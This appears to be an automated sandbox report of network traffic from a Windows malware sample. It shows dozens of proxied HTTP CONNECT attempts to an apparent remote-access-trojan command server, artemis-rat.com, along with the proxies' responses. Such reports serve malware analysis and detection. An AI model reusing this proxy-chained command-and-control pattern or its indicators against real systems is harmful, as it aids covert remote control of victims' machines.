Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.603414059 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.899086952 CET | 226 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Length: 101
Content-Type: text/plain; charset=utf-8
Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
538192.168.2.551462103.118.44.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.628974915 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
539192.168.2.55047591.211.177.3736293876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.629168034 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
540192.168.2.5515278.213.128.90210253876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.633248091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.963520050 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
541192.168.2.551640205.196.184.69507043876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.634326935 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.123589993 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.732971907 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.092703104 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.318907976 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
542192.168.2.55155672.206.181.12341453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.636847019 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
543192.168.2.551509139.129.162.6531283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.682570934 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.058787107 CET | 767 | IN | HTTP/1.1 403 Forbidden
Server: Beaver
Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            544192.168.2.550543188.40.44.83803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.683693886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.702141047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.702605963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.701958895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.701977015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            545192.168.2.551557184.185.2.1241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.683696985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            546192.168.2.55168534.102.179.21803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.683834076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.955913067 CET462INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                            Content-Length: 317
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>405 Method Not Allowed</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Method Not Allowed</h1><h2>The request method <code>CONNECT</code> is inappropriate for the URL <code>/</code>.</h2><h2></h2></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            547192.168.2.551689162.214.154.176322103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.684359074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.139182091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.654889107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.702430010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811731100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.905631065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014604092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.217742920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.514575958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            548192.168.2.551721132.148.128.8885953876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.684983969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.139179945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.654889107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.702083111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            549192.168.2.551712159.89.138.130803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.685066938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.860451937 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.10.3 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            550192.168.2.551542218.6.120.11177773876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.685244083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.770670891 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            551192.168.2.551488103.190.54.141803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.685247898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            552192.168.2.55055872.195.34.5841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.685322046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            553192.168.2.55162798.175.31.19541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.685684919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            554192.168.2.551548192.252.216.8141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.694021940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            555192.168.2.551759185.162.230.201803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.694266081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.857326984 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            556192.168.2.551547103.23.101.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.694693089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            557192.168.2.550702142.4.7.20107223876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.694935083 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.806237936 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.905225992 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.014626980 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            558192.168.2.551591185.18.198.163587143876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.696230888 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.326689005 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.202874899 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            559192.168.2.550491103.148.51.1980803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.698462963 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            560192.168.2.551570196.20.125.14980833876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.699160099 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            561192.168.2.551606212.110.188.189344053876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.699290037 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.950504065 CET | 39 | IN | HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            562192.168.2.55157746.105.35.19380803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.700112104 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.006129026 CET | 202 | IN | HTTP/1.0 404 Not Found
Content-Length: 717
Content-Type: text/html
Date: Mon, 11 Mar 2024 02:30:38 GMT
